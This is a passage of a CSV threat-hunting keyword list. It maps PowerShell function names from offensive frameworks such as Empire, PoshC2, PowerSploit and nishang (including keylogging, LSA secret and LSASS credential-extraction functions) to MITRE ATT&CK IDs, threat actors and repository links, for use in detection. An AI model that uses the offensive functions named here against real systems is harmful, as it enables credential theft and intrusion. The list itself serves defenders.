enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" +"*Get-KeePassINIFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-KeePassXMLFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-KeystrokeData*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-Keystrokes *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-Keystrokes*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1067","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-Keystrokes*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-Killdate*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-killdate*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-KIWI_KERBEROS_LOGON_SESSION*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" +"*Get-LastLoggedon -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-LastLoggedOn*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*getLocalAdm*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Get-LoggedOnLocal -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-LoggedonLocal -ComputerName *","greyware_tool_keyword","powershell","PowerView get Locally logged users on a machine","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-LsaRunAsPPLStatus*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Get-LSASecret*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Get-ModifiableRegistryAutoRun*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ModifiableRegistryAutoRun*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-ModifiableScheduledTaskFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ModifiableScheduledTaskFile*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-ModifiableService*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-MpComputerStatus*","greyware_tool_keyword","powershell","Gets the status of antimalware software on the computer.","T1063","TA0005 - TA0007","N/A","N/A","Discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Get-NetComputer -Unconstrainuser*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetDomainController*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetDomainTrust*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*get-netfileserver -domain *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-NetFileServer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetFileServer*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetForestCatalog*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetForestDomain*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetForestDomain*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetForestTrust*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetGPOGroup*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetGroupMember -GroupName *DNSAdmins*","greyware_tool_keyword","powershell","the command is used to discover the members of a specific domain group DNSAdmins which can provide an adversary with valuable information about the target environment. The knowledge of group members can be exploited 